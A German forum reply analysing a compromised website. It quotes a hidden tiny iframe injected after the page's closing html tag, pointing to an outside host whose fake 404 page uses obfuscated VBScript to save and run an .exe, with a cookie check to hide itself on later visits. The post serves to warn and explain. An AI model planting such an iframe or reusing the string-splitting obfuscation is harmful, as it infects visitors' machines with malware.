Hallo,

Die Site stammt von Jens Grochtdreis, welchen ich durchaus als vertrauenswürdig einstufen würde, ich halte diese Meldungen also eher für Fehlalarme.

Kennst Du Jens Grochtdreis näher?

Am Ende des Quelltextes von www.css-faq.de, nach dem schließenden html-Tag, steht folgendes:

<html>
<body>
<iframe width='2' height='2' border='0' frameborder='0' src='http://www.powersales.info/banners/index.php'></iframe>
</body>
</html>

Die Seite www.powersales.info/banners/index.php generiert eine 404-Seite, welche allerdings versucht ein Cookie zu setzen. Wenn sie dieses Cookie noch nicht vorfindet, versucht sie per VBScript mit

CreateObject("Scrip"+"t"+"in"+"g"+"."+"F"+"ileS"+"y"+"s"+"temO"+"bject","")
...

eine .exe-Datei im lokalen Dateisystem zu speichern und dann mit

CreateObject("WScrip"+"t.S"+"hell","")
...

auszuführen.

Ist der cookie gesetzt, wird dieser Quellcodeabschnitt nicht mehr generiert, sondern es wird nur noch eine "not found"-Seite vorgespiegelt.

Der selbe IFRAME findet sich übrigens auch auf www.grochtdreis.de.

viele Grüße

Axel